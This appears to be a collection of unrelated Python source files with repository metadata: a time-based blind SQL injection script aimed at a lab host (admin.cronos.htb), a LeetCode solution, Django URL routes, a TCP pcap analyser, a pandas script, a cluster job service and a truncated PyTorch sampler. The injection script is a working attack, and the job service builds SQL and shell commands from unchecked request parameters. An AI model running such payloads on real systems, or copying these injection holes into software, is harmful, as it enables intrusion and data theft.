4bf2980aab49ca6f4911ed4cfa193946ca4187bf
|
[] |
no_license
|
AmatheraeWorld/AmatheraeWorld
|
5985a6731221d375750d30ca22c59fe3aed52a1f
|
1b32d2d2fed410c9c486c1cbc21dc8fa0ac8d1a7
|
refs/heads/master
| 2023-06-16T13:41:32.443881
| 2021-07-11T20:26:51
| 2021-07-11T20:26:51
| 265,905,582
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,147
|
py
|
#!/usr/bin/python3
import requests, time, sys, signal
from pwn import *
def def_handler(sig, frame):
log.faiulure("Saliendo")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
url = 'http://admin.cronos.htb/index.php'
burp = {'http': 'http://127.0.0.1:8080'}
s = r'0123456789abcdefghijklmnopqrstuvwxyz'
result = ''
def check(payload):
data_post = {
'username': '%s' % payload,
'password': 'test'
}
time_start = time.time()
content = requests.post(url, data=data_post)
time_end = time.time()
if time_end - time_start > 5:
return 1
p2 = log.progress("Payload")
for j in range(0,5):
p1 = log.progress("Columnas [%d]" % j)
for i in range (1, 10):
for c in s:
payload = "' or if(substr((select column_name from information_schema.columns where table_schema='admin' and table_name='users' limit %d,1),%d,1)='%c',sleep(5),1)-- -" % (j, i, c)
p2.status("%s" % payload)
if check(payload):
result += c
p1.status("%s" % result)
break
p1.success("%s" % result)
result = ''
|
[
"noreply@github.com"
] |
noreply@github.com
|
241b062d29b2a2e895a396fb385dd2ffb44bab96
|
3ff9821b1984417a83a75c7d186da9228e13ead9
|
/No_1410_HTML Entity Parser/by_re_replacement.py
|
c017682935944a4f3a73df684c4c097a91d80e6d
|
[
"MIT"
] |
permissive
|
brianchiang-tw/leetcode
|
fd4df1917daef403c48cb5a3f5834579526ad0c2
|
6978acfb8cb767002cb953d02be68999845425f3
|
refs/heads/master
| 2023-06-11T00:44:01.423772
| 2023-06-01T03:52:00
| 2023-06-01T03:52:00
| 222,939,709
| 41
| 12
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,076
|
py
|
'''
Description:
HTML entity parser is the parser that takes HTML code as input and replace all the entities of the special characters by the characters itself.
The special characters and their entities for HTML are:
Quotation Mark: the entity is " and symbol character is ".
Single Quote Mark: the entity is ' and symbol character is '.
Ampersand: the entity is & and symbol character is &.
Greater Than Sign: the entity is > and symbol character is >.
Less Than Sign: the entity is < and symbol character is <.
Slash: the entity is ⁄ and symbol character is /.
Given the input text string to the HTML parser, you have to implement the entity parser.
Return the text after replacing the entities by the special characters.
Example 1:
Input: text = "& is an HTML entity but &ambassador; is not."
Output: "& is an HTML entity but &ambassador; is not."
Explanation: The parser will replace the & entity by &
Example 2:
Input: text = "and I quote: "...""
Output: "and I quote: \"...\""
Example 3:
Input: text = "Stay home! Practice on Leetcode :)"
Output: "Stay home! Practice on Leetcode :)"
Example 4:
Input: text = "x > y && x < y is always false"
Output: "x > y && x < y is always false"
Example 5:
Input: text = "leetcode.com⁄problemset⁄all"
Output: "leetcode.com/problemset/all"
Constraints:
1 <= text.length <= 10^5
The string may contain any possible characters out of all the 256 ASCII characters.
'''
import re
class Solution:
def entityParser(self, text: str) -> str:
html_symbol = [ '"', ''', '>', '<', '⁄', '&']
formal_symbol = [ '"', "'", '>', '<', '/', '&']
for html_sym, formal_sym in zip(html_symbol, formal_symbol):
text = re.sub( html_sym , formal_sym, text )
return text
# n : the character length of input, text.
## Time Complexity: O( n )
#
# The overhead in time is the cost of string replacement, which is of O( n ).
## Space Complexity: O( n )
#
# The overhead in space is the storage for output string, which is of O( n ).
from collections import namedtuple
TestEntry = namedtuple('TestEntry', 'text')
def test_bench():
test_data = [
TestEntry( text = "& is an HTML entity but &ambassador; is not." ),
TestEntry( text = "and I quote: "..."" ),
TestEntry( text = "Stay home! Practice on Leetcode :)" ),
TestEntry( text = "x > y && x < y is always false" ),
TestEntry( text = "leetcode.com⁄problemset⁄all" ),
]
# expected output:
'''
& is an HTML entity but &ambassador; is not.
and I quote: "..."
Stay home! Practice on Leetcode :)
x > y && x < y is always false
leetcode.com/problemset/all
'''
for t in test_data:
print( Solution().entityParser( text = t.text) )
return
if __name__ == '__main__':
test_bench()
|
[
"brianchiang1988@icloud.com"
] |
brianchiang1988@icloud.com
|
72f601d574e8d581120332421e096abfc29920f1
|
3280dd107a70e7d3637bfcfc2819f9b1477ed99a
|
/Myquizproject/Myquizproject/urls.py
|
55bd04fcaf038ecb464df39accb26f55b4cbb00c
|
[] |
no_license
|
pooja666-v/pv_Quiz_repo
|
80b9cc3cb1c45a48e30f9e4f15392bbdf02bf22b
|
fc59c7fb7a92549b8cea3fac0f4cb451bdbcc2f7
|
refs/heads/master
| 2023-05-26T23:17:45.797984
| 2021-06-15T13:01:31
| 2021-06-15T13:01:31
| 376,889,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,568
|
py
|
"""Myquizproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from quiz import views
from django.contrib.auth.views import LogoutView,LoginView
urlpatterns = [
path('admin/', admin.site.urls),
path('teacher/',include('teacher.urls')),
path('student/',include('student.urls')),
path('',views.home_view,name=''),
path('logout', LogoutView.as_view(template_name='quiz/logout.html'),name='logout'),
path('aboutus', views.aboutus_view),
path('contactus', views.contactus_view),
path('afterlogin', views.afterlogin_view,name='afterlogin'),
path('adminclick', views.adminclick_view),
path('adminlogin', LoginView.as_view(template_name='quiz/adminlogin.html'),name='adminlogin'),
path('admin-dashboard', views.admin_dashboard_view,name='admin-dashboard'),
path('admin-teacher', views.admin_teacher_view,name='admin-teacher'),
path('admin-view-teacher', views.admin_view_teacher_view,name='admin-view-teacher'),
path('update-teacher/<int:pk>', views.update_teacher_view,name='update-teacher'),
path('delete-teacher/<int:pk>', views.delete_teacher_view,name='delete-teacher'),
path('admin-view-pending-teacher', views.admin_view_pending_teacher_view,name='admin-view-pending-teacher'),
path('admin-view-teacher-salary', views.admin_view_teacher_salary_view,name='admin-view-teacher-salary'),
path('approve-teacher/<int:pk>', views.approve_teacher_view,name='approve-teacher'),
path('reject-teacher/<int:pk>', views.reject_teacher_view,name='reject-teacher'),
path('admin-student', views.admin_student_view,name='admin-student'),
path('admin-view-student', views.admin_view_student_view,name='admin-view-student'),
path('admin-view-student-marks', views.admin_view_student_marks_view,name='admin-view-student-marks'),
path('admin-view-marks/<int:pk>', views.admin_view_marks_view,name='admin-view-marks'),
path('admin-check-marks/<int:pk>', views.admin_check_marks_view,name='admin-check-marks'),
path('update-student/<int:pk>', views.update_student_view,name='update-student'),
path('delete-student/<int:pk>', views.delete_student_view,name='delete-student'),
path('admin-course', views.admin_course_view,name='admin-course'),
path('admin-add-course', views.admin_add_course_view,name='admin-add-course'),
path('admin-view-course', views.admin_view_course_view,name='admin-view-course'),
path('delete-course/<int:pk>', views.delete_course_view,name='delete-course'),
path('admin-question', views.admin_question_view,name='admin-question'),
path('admin-add-question', views.admin_add_question_view,name='admin-add-question'),
path('admin-view-question', views.admin_view_question_view,name='admin-view-question'),
path('view-question/<int:pk>', views.view_question_view,name='view-question'),
path('delete-question/<int:pk>', views.delete_question_view,name='delete-question'),
]
|
[
"poojavasawade98@gmail.com"
] |
poojavasawade98@gmail.com
|
233d511497513d1530a9e8ff0eb47948dc21f5d0
|
d33065f76aa1a59142794364bb65526771ee71b3
|
/PDS/tcpstats
|
0bf7c29658d2db29425445bd767ee5578cad4f0f
|
[] |
no_license
|
annaostroukh/University-projects
|
31e300aa0674e13a6d3cb83dc4ccc0161e98bb02
|
d16e64030f4230107130d770e3c15e472aed7319
|
refs/heads/master
| 2021-01-11T14:14:20.619238
| 2017-02-07T14:50:46
| 2017-02-07T14:50:46
| 81,216,867
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,103
|
#!/usr/bin/env python2.7
import datetime
from decimal import Decimal
import socket
import struct
import sys
import webbrowser
import dpkt
from dpkt.tcp import TCP
from dpkt.ethernet import Ethernet
from dpkt.ip import IP, IP_PROTO_TCP
import json
def main():
computeTCPStat()
# function parse a packet capture
# @filename is a name of file which we parse
# return file_entries - list of dictionaries with parsed tcp data
def fileParse(filename):
f = open(filename, 'rb') # opening a packet file
pcap = dpkt.pcap.Reader(f) # reading a packet file
packet_counter = 0 # counter of packets in a file
file_entries = [] # list of dictionaries of tcp data entries
keys = ('packet #', 'time', 'len', 'seq', 'ack', 'window', 'scale factor', 'payload', 'sum', 'flags', 'source', 'source ip', 'destination', 'destination ip') # keys for each value in dictionary
for timestamp, buf in pcap:
packet_counter += 1
eth = Ethernet(buf)
if eth.type != dpkt.ethernet.ETH_TYPE_IP: # if not an IP packet
continue
ip = eth.data
dst_ip = socket.inet_ntoa(ip.dst)
src_ip = socket.inet_ntoa(ip.src)
if ip.p != IP_PROTO_TCP: # if not a TCP packet
print ("No TCP packet found")
continue
tcp = ip.data
# Allow to decode flags
fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0
syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0
rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0
psh_flag = (tcp.flags & dpkt.tcp.TH_PUSH) != 0
ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0
urg_flag = (tcp.flags & dpkt.tcp.TH_URG) != 0
ece_flag = (tcp.flags & dpkt.tcp.TH_ECE) != 0
cwr_flag = (tcp.flags & dpkt.tcp.TH_CWR) != 0
# human-readable definitions of flags
flags = (("FIN " if fin_flag else "") +
("SYN " if syn_flag else "") +
("RST " if rst_flag else "") +
("PSH " if psh_flag else "") +
("ACK " if ack_flag else "") +
("URG " if urg_flag else "") +
("ECE " if ece_flag else "") +
("CWR " if cwr_flag else ""))
# define window scale factor
option_list = dpkt.tcp.parse_opts(tcp.opts)
for option in option_list:
if option[0] == 3:
WSCALE = struct.unpack(">b", option[1])
time = Decimal(datetime.datetime.utcfromtimestamp(timestamp).strftime('%S.%f'))
# tulip with values of each packet in dictionary
data = (packet_counter, time, len(buf), tcp.seq, tcp.ack, tcp.win, WSCALE[0], len(tcp.data), tcp.sum, flags, tcp.sport, src_ip, tcp.dport, dst_ip)
tcp_data = dict(zip(keys, data)) # matching keys with values and adding entries to the dictionary
file_entries.append(tcp_data) # creating a list of dictionaries with parsed tcp data
f.close()
return file_entries
def computeTCPStat():
print ("Parsing a file...")
file_entries = fileParse(filename)
timeVal = [] # list of dictionaries with time values
outputDict =[] # output dictionary
keysTime = ('packet #', 'time', 'delta')
curTime = 0 # current time for speed measurements
print ("Analysing statistics...")
for i in range(len(file_entries)):
# Setting up reference packet according to SYN flag (TCP connection initiated)
if file_entries[i]['flags'] == 'SYN ':
refPacket = file_entries[i]['packet #']
timeVal.append({'packet #': refPacket, 'time': Decimal(0.000000), 'delta': Decimal(0.000000)}) # Setting up reference time and adding reference packet to dictionary
# Computing delta and reference time
for refPacket in range(len(file_entries) - refPacket):
delta = file_entries[refPacket+1]['time'] - file_entries[refPacket]['time'] # Time delta from reference packet
time = delta + Decimal(timeVal[refPacket]['time']) # Time since reference packet
packet = refPacket+2
# Saving time statistics to dictionary
dataTime = (packet, time, abs(delta))
timeVal.append(dict(zip(keysTime, dataTime)))
# Getting the receiver and sender parameters of a TCP connection
for i in range(len(file_entries)):
if file_entries[i]['flags'] == 'SYN ':
receiverIP = file_entries[i]['destination ip']
receiverWinScale = pow(2, file_entries[i]['scale factor'])
if file_entries[i]['flags'] == 'SYN ACK ':
senderIP = file_entries[i]['destination ip']
senderWinScale = pow(2, file_entries[i]['scale factor'])
# Receiver window
for i in range(len(file_entries)):
if (file_entries[i]['flags'] != 'SYN ' and file_entries[i]['flags'] != 'SYN ACK ') and file_entries[i]['destination ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
recWin = file_entries[i]['window'] * receiverWinScale
timeRecWin = timeVal[i]['time']
dataRec = (str(timeRecWin), str(recWin))
keysRec = ('ReceiverTime', 'RecWin')
outputDict.append(dict(zip(keysRec, dataRec)))
# Sender window
for i in range(len(file_entries)):
if (file_entries[i]['flags'] != 'SYN ' and file_entries[i]['flags'] != 'SYN ACK ') and file_entries[i]['destination ip'] == senderIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
sendWin = file_entries[i]['window'] * senderWinScale
timeSendWin = timeVal[i]['time']
dataSend = (str(timeSendWin), str(sendWin))
keysSend = ('SenderTime', 'SenderWin')
outputDict.append(dict(zip(keysSend, dataSend)))
# Round trip time
for i in range(len(file_entries)):
# Receiver RTT
if file_entries[i]['flags'] == 'ACK ' and file_entries[i]['destination ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
if file_entries[i]['seq'] == file_entries[i-1]['ack'] and file_entries[i-1]['flags'] != 'SYN ACK ' and file_entries[i-1]['flags'] != 'FIN ACK ':
rtt = timeVal[i-1]['delta']
seqNumber = file_entries[i-1]['seq']
dataRtt = (str(rtt * 1000), str(seqNumber)) # Saving rtt converted to [ms]
keysRtt = ('RTT', 'Sequence')
outputDict.append(dict(zip(keysRtt, dataRtt)))
# Slow start
for i in range(len(file_entries)):
# Receiver SS (packets from server)
if (file_entries[i]['flags'] == 'SYN ACK ' or file_entries[i]['flags'] == 'ACK ' or file_entries[i]['flags'] == 'FIN ACK ') and file_entries[i]['source ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
if file_entries[i]['flags'] == 'SYN ACK ':
time = 0 # setting reference time according to the first SYN ACK packet
if file_entries[i]['flags'] == 'ACK ' or file_entries[i]['flags'] == 'FIN ACK ':
time = time + timeVal[i]['delta'] # time on X-axis will show how RTT is changing since time reference
seqNumberSS = file_entries[i]['seq']
dataSS = (str(time), str(seqNumberSS))
keysSS = ('TimeSS', 'SequenceSS')
outputDict.append(dict(zip(keysSS, dataSS)))
# Sender SS (packets from client)
if (file_entries[i]['flags'] == 'SYN ' or file_entries[i]['flags'] == 'ACK ' or file_entries[i]['flags'] == 'FIN ACK ') and file_entries[i]['source ip'] == senderIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
seqNumberSS = file_entries[i]['seq']
timeSS = timeVal[i]['time']
dataSS = (str(timeSS), str(seqNumberSS))
keysSS = ('TimeSSsen', 'SequenceSSsen')
outputDict.append(dict(zip(keysSS, dataSS)))
# Speed of TCP connection in interval 0.01 s
timerRange = int((int(timeVal[-1]['time'])+1)/0.01) # setting up a required amount of steps to look through packets
for timer in range(timerRange):
lastTime = curTime
curTime = curTime + 0.01
byte = 0 # bytes of receiver
byteSen = 0 # bytes of sender
bytes =[]
bytesSen = []
for i in range(len(timeVal)):
# Receiver speed
if lastTime <= timeVal[i]['time'] <= curTime and file_entries[i]['source ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
byte = byte + file_entries[i]['len']
time = lastTime
bytes.append(byte)
# Sender speed
elif lastTime <= timeVal[i]['time'] <= curTime and file_entries[i]['source ip'] == senderIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
byteSen = byteSen + file_entries[i]['len']
timeSen = lastTime
bytesSen.append(byteSen)
# computing receiver bytes
if bytes:
bytessum = max(bytes)
else:
time = lastTime
bytessum = 0
dataSp = (str(time), str(bytessum))
keysSp = ('Time', 'BytesRec')
outputDict.append(dict(zip(keysSp, dataSp)))
# computing sender bytes
if bytesSen:
bytessumSen = max(bytesSen)
else:
timeSen = lastTime
bytessumSen = 0
dataSpSen = (str(timeSen), str(bytessumSen))
keysSpSen = ('TimeSen', 'BytesSen')
outputDict.append(dict(zip(keysSpSen, dataSpSen)))
# Exporting statistics to JSON log file
print ("Exporting statistics...")
file = open("log.json", "w")
json.dump(outputDict, file, indent = 1)
file.close()
if __name__ == "__main__":
if len(sys.argv)>1:
filename = sys.argv[1]
main()
|
[
"annaostroukh@gmail.com"
] |
annaostroukh@gmail.com
|
|
a0805ca69c9facac7d1aacfd3d9aa666d1741f76
|
94a27c14e31aeac3fe16980240e19634837679a8
|
/max-frequency.py
|
a9828419afb5ee165a3274267b910be6b95e359b
|
[] |
no_license
|
EEmery/anomaly-detection
|
73762045eb317f0dc565f1199b28c61ce8fe1756
|
3fbb098ea483c85a7f0bec46ca33c3b3b417dbbf
|
refs/heads/master
| 2020-04-05T23:28:35.698159
| 2017-09-10T00:35:39
| 2017-09-10T00:35:39
| 83,551,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,148
|
py
|
# Imports necessary libraries
print "Importing packages\n"
import pandas as pd
import matplotlib.pyplot as plt
from warnings import filterwarnings
from numpy import nan
# Ignores warnings
filterwarnings("ignore")
input_file_path = "Data/preprocessed_v2/not-normalized/"
periods = ['WEEK', 'MONTH', 'QUARTER', 'SEMESTER']
periods_amounts = [53, 12, 4, 2]
file_names = ['weekly', 'monthly', 'quarterly', 'semesterly']
# Iterates over all periods
for period, period_amount, file_name in zip(periods, periods_amounts, file_names):
print "Making " + file_name + " analysis"
# Opens file (related to the period)
periodic_analysis = pd.read_csv(input_file_path + file_name + '_analysis.csv')
# Remover YEAR necessity by increasing period limits
periodic_analysis[period] = periodic_analysis[period] + (periodic_analysis['YEAR'] - 2015) * period_amount
# Slices data frame to get only necessary columns
periodic_analysis = periodic_analysis[['ID', period, 'FREQUENCY', 'GE_MEAN', 'GNV_MEAN', 'GP_MEAN', 'DO_MEAN']]
# Reshapes data frame to desired shape
periodic_analysis = periodic_analysis.set_index(['ID', period])
periodic_analysis = periodic_analysis.stack().unstack(1)
# Gets the period of higher frequency
max_frequencies = periodic_analysis.loc(axis=0)[:, 'FREQUENCY'].idxmax(axis=1).reset_index().rename(columns={0:'STAMP'})
# Creates a data frame for final results
result_df = pd.DataFrame(columns = ['ID', 'GE_MEAN', 'GNV_MEAN', 'GP_MEAN', 'DO_MEAN'])
# Iterates over the ID's
for i, ID, STAMP in zip(range(len(max_frequencies)), max_frequencies['ID'], max_frequencies['STAMP']):
data = periodic_analysis.loc(axis=0)[ID].ix[1:, STAMP] # Gets the means from the higher frequency period
row = [ID]
for mean in ['GE_MEAN', 'GNV_MEAN', 'GP_MEAN', 'DO_MEAN']: # Iterates over all fule type means
try:
row.append(data[mean]) # Appends to final result
except KeyError:
row.append(nan)
result_df.loc[i] = row # Appends to result data frame
# Show some data
if period == 'MONTH':
print len(result_df)
periodic_analysis.loc['741NKH'].T.plot.bar()
plt.show()
|
[
"emeryecs@gmail.com"
] |
emeryecs@gmail.com
|
e65631e729c8549976a81aa1a8b98e467e8c7c78
|
228dd278c875b9539908afffefcfe5b130a28a62
|
/v2/src/code/measure_service2.py
|
44431c1f5d47dc6869ce58091850202aa7bda78f
|
[] |
no_license
|
sheriefvt/MARS-services
|
57d9ca81f1f606ca8a8938e75b41fb806a36f8b9
|
a5f6b6140b0c8a30cd083a41a465f0bc999017a1
|
refs/heads/master
| 2021-04-30T12:50:53.156082
| 2018-02-13T02:06:11
| 2018-02-13T02:06:11
| 121,283,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,415
|
py
|
__author__ = 'Sherif Abdelhamid'
#Measure Service Version 1.0 Beta
from bottle import get, post, request, run # or route
import os
import threading
import time
import networkx as nx
import sqlite3
import json
import datetime
import ConfigParser,io
with open ('mars.config', "r") as myfile:
data=myfile.read()
config = ConfigParser.RawConfigParser(allow_no_value=True)
config.readfp(io.BytesIO(data))
server = config.get("MARS_configuration", "server")
host = config.get("MARS_configuration", "host")
port = config.get("MARS_configuration", "port")
port2 = config.get("MARS_configuration", "port2")
port3 = config.get("MARS_configuration", "port3")
database_path = config.get("MARS_configuration", "database")
index_path1 = config.get("MARS_configuration", "index1")
index_path2 = config.get("MARS_configuration", "index2")
file_path = config.get("MARS_configuration", "uploadfile")
qsub_path = config.get("MARS_configuration", "qsub")
graph_path = config.get("MARS_configuration", "graph")
code_path = config.get("MARS_configuration", "code")
output_path = config.get("MARS_configuration", "output")
qlog_path = config.get("MARS_configuration", "qlog")
class MyError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
##End point to call the measure service to compute a specific measure on a network.
@get('/graphservice/measure/compute')
def do_compute():
gname = request.query.get('graph')
mid = request.query.get('measure')
p = getmeasureinfo(mid)
if p[3]=='None':
par=''
else:
par = p[3]
ts = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d--%H:%M:%S')
if p[1]=="networkx":
tmp=networkx_qsub(gname,p[0],ts,par)
elif p[1] == "galib":
tmp = galib_qsub(gname,p[2],ts,par,p[0])
elif p[1] == "standalone":
tmp = cplus_qsub(gname,p[2],ts,par,p[0])
elif p[1] == "sql":
tmp =sql_qsub(gname,ts,p[5],p[2],p[4],p[0])
name =qsub_path +gname+"-"+mid+'.qsub'
f1 = open(name, "w")
f1.write(tmp)
f1.close()
if os.path.exists(name):
qb = threading.Thread(name='qsub_worker', target=qsub_worker(name))
qb.start()
return
##Function to create qsub file for calculating degree within DBMS
def sql_qsub(gname,ts,dbname,sqlstmt,target,m):
tmp2=sqlstmt.format(g=gname)
tmp='''#!/bin/bash
#PBS -lwalltime=10:00:00
#PBS -W group_list=sipcinet
#PBS -q sfx_q
#PBS -N {gname}-{measure}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
cd $PBS_O_WORKDIR
sqlite3 {dp} 'update {g}_{tr} set {mn} = ({sq})'
'''.format(g=gname,mn=dbname,ti=ts,tr=target,sq=tmp2,dp=database_path,measure=m,qp=qlog_path)
return tmp
##Function to create qsub file for calculating different measures using networkx library. Currently, it calculates the degree,
# betweeness_centrality, clustering, load_centrality, node_clique_number, and closeness_centrality.
def networkx_qsub(gname,command,ts,parameter):
tmp='''#!/bin/bash
#PBS -lwalltime=10:00:00
#PBS -W group_list=sipcinet
#PBS -q sfx_q
#PBS -N {graph_name}-{measure}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
cd $PBS_O_WORKDIR
export PATH=/home/sipcinet/edison/python-2.7.9/bin:$PATH
python {cp}measure.py {gp}{graph_name} {op}{graph_name}_{measure}.out {measure} {graph_name} {pr}
'''.format(graph_name=gname,measure=command,ti=ts,cp=code_path,op=output_path,pr=parameter,gp=graph_path,qp=qlog_path)
return tmp
##Function to create qsub file for calculating keshell using code provided by Chris Kulhman. Code is an executable.
def cplus_qsub(gname,mname,ts,parameter,command):
tmp='''#!/bin/bash
#PBS -lwalltime=10:00:00
#PBS -W group_list=sipcinet
#PBS -q sfx_q
#PBS -N {graph_name}-{cmd}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
cd $PBS_O_WORKDIR
export PATH=/home/sipcinet/edison/python-2.7.9/bin:$PATH
{cp}{measure} {gp}{graph_name}.uel {pr} {op}{graph_name}_{cmd}.out
'''.format(graph_name=gname,measure=mname,ti=ts,cp=code_path,gp=graph_path,pr=parameter,cmd=command,op=output_path,qp=qlog_path)
return tmp
##Function to create qsub file for calculating clustering coef. using code provided by Maliq. Code is an executable
def galib_qsub(gname,mname,ts,parameter,cmd2):
tmp='''#!/bin/sh
#PBS -l walltime=10:00:00
#PBS -l nodes=10:ppn=1
#PBS -W group_list=ndssl
#PBS -q ndssl_q
#PBS -A ndssl
#PBS -N {graph_name}-{cmd}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
#PBS -j oe
. /etc/profile.d/modules.sh
module add mvapich2/gcc
#module add mpiexec
time mpiexec -f $PBS_NODEFILE {cp}{command} {gp}{graph_name}.gph {op}{graph_name}_{cmd}.out {pr}
exit;
'''.format(graph_name=gname,command=mname,cp=code_path,ti=ts,pr=parameter,cmd=cmd2,gp=graph_path,op=output_path,qp=qlog_path)
return tmp
##Load measure information from DB
def getmeasureinfo(m):
db = sqlite3.connect(database_path)
c = db.cursor()
sqlt = ("select id,package,command,parameter,target from measure where id='{c}'").format(c=m)
c.execute(sqlt)
data = c.fetchone()
return data
##Submit qsub job request
def qsub_worker(name):
os.system('qsub {filename}'.format(filename=name))
run(server=server,host=host, port=port3,debug=True)
|
[
"sherif@cos.io"
] |
sherif@cos.io
|
7f083320d95a03e5d1511f9b21545afc2344cbca
|
3f0a0ee646326530c4cd6996276e8c819dfab65c
|
/battleship.py
|
5bcc8530ea64006f289500c7ec2e3a8ebc74e6fa
|
[] |
no_license
|
kidisty/Python-1
|
bde878603283a6b3b966296ad2d4b0f89f70000f
|
203cd35b07633610b3773c0100c342386e636935
|
refs/heads/master
| 2022-11-12T07:11:15.072699
| 2020-07-06T09:59:33
| 2020-07-06T09:59:33
| 277,503,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,215
|
py
|
import random
board = []
for x in range(5):
board.append(["O"] * 5)
def print_board(board):
for row in board:
print " ".join(row)
print "Let's play Battleship!"
print_board(board)
def random_row(board):
return random.randint(0, len(board) - 1)
def random_col(board):
return random.randint(0, len(board[0]) - 1)
ship_row = random_row(board)
ship_col = random_col(board)
# print ship_row
# print ship_col
turn = 0
# Everything from here on should go in your for loop!
# Be sure to indent four spaces!
for turn in range(4):
guess_row = input("Guess Row:")
guess_col = input("Guess Col:")
if guess_row == ship_row and guess_col == ship_col:
print "Congratulations! You sunk my battleship!"
break
else:
if (guess_row < 0 or guess_row > 4) or (guess_col < 0 or guess_col > 4):
print "Oops, that's not even in the ocean."
elif(board[guess_row][guess_col] == "X"):
print "You guessed that one already."
else:
print "You missed my battleship!"
board[guess_row][guess_col] = "X"
# Print (turn + 1) here!
if turn > 4:
print "Game Over"
print turn + 1
print_board(board)
|
[
"kidistyohannes@kidists-MacBook-Pro.local"
] |
kidistyohannes@kidists-MacBook-Pro.local
|
dcbe927e6b4d7e84a65d80d415af4b07cbf43625
|
7e64b95e39d9a0a95e25eae82b01bfef2b6e550c
|
/benchmarking/model_one_job_batched.py
|
03714abbeeabd1ced60e64916c8e2a06568264bb
|
[
"MIT"
] |
permissive
|
yuGithuuub/scCODA_reproducibility
|
a927075d9cbca2b0f1ff4d9ad74b872e286591dc
|
1f2565eca4bc9e6ccd16aa6885ccde6c19caa196
|
refs/heads/main
| 2023-01-23T03:23:04.559234
| 2020-12-10T15:14:19
| 2020-12-10T15:14:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,832
|
py
|
# Only relevant for server execution
import pickle as pkl
import sys
import os
import benchmark_utils as add
dataset_path = sys.argv[1]
save_path = sys.argv[2]
model_name = sys.argv[3]
count = int(sys.argv[4])
if sys.argv[5] == "True":
keep_sccoda_results = True
else:
keep_sccoda_results = False
print("model name:", model_name)
file_name = os.listdir(dataset_path)[count]
if model_name == "ALDEx2_alr":
kwargs = {"server": True,
"method": "we.eBH",
"mc_samples": 128,
"denom": [5],
"alpha": 0.05,
"fdr_correct": False}
elif model_name == "ALDEx2":
kwargs = {"server": True,
"method": "we.eBH",
"mc_samples": 128,
"alpha": 0.05,
"fdr_correct": False}
elif model_name in ["simple_dm", "scCODA"]:
kwargs = {"num_results": 20000,
"n_burnin": 5000,
"num_adapt_steps": 4000,
"keep_sccoda_results": keep_sccoda_results}
elif model_name in ["alr_ttest", "alr_wilcoxon"]:
kwargs = {"reference_index": 4,
"alpha": 0.05,
"fdr_correct": True}
elif model_name in ["Haber", "ttest", "clr_ttest", "dirichreg"]:
kwargs = {"alpha": 0.05,
"fdr_correct": True}
elif model_name == "scdc":
kwargs = {"server": True}
else:
kwargs = {}
if keep_sccoda_results:
results, effects = add.model_on_one_datafile(dataset_path+file_name, model_name, **kwargs)
results = add.get_scores(results)
save = {"results": results, "effects": effects}
else:
results = add.model_on_one_datafile(dataset_path+file_name, model_name, **kwargs)
results = add.get_scores(results)
save = results
with open(save_path + model_name + "_results_" + str(count) + ".pkl", "wb") as f:
pkl.dump(save, f)
|
[
"johannes.ostner@online.de"
] |
johannes.ostner@online.de
|
c0fc1c5fe7e20c2b73669f3d38ce4eff71b3fa44
|
400f4a13784f93029dbe035392ba62f0956f1c1f
|
/sampler.py
|
8ec1187020e92427b9f63246e08ea5c919a22c2b
|
[
"MIT"
] |
permissive
|
ussama-azizun/Masked_Face_Recognition
|
5e3516ec0d99380ef22decdd06c536bfe79a6cd1
|
2dc572573ebd9ac208314690b529ed69addf0913
|
refs/heads/master
| 2023-07-13T03:49:27.553385
| 2021-08-03T07:51:35
| 2021-08-03T07:51:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,331
|
py
|
from torch.utils.data.sampler import Sampler
import itertools
import numpy as np
def samples(df):
label_to_samples = []
samples = []
label = 0
for index, row in df.iterrows():
if index == 0:
samples.append(index)
label = row['target']
else:
if row['target'] != label:
label_to_samples.append(samples)
samples = []
label = row['target']
samples.append(index)
return label_to_samples
class PKSampler(Sampler):
def __init__(self, data_source, p=15, k=20):
super().__init__(data_source)
self.p = p
self.k = k
self.data_source = data_source
def __iter__(self):
pk_count = len(self) // (self.p * self.k)
for _ in range(pk_count):
labels = np.random.choice(np.arange(len(self.data_source.label_to_samples)), self.p, replace=False)
for l in labels:
indices = self.data_source.label_to_samples[l]
replace = True if len(indices) < self.k else False
for i in np.random.choice(indices, self.k, replace=replace):
yield i
def __len__(self):
pk = self.p * self.k
samples = ((len(self.data_source) - 1) // pk + 1) * pk
return samples
def grouper(iterable, n):
it = itertools.cycle(iter(iterable))
for _ in range((len(iterable) - 1) // n + 1):
yield list(itertools.islice(it, n))
# full label coverage per 'epoch'
class PKSampler2(Sampler):
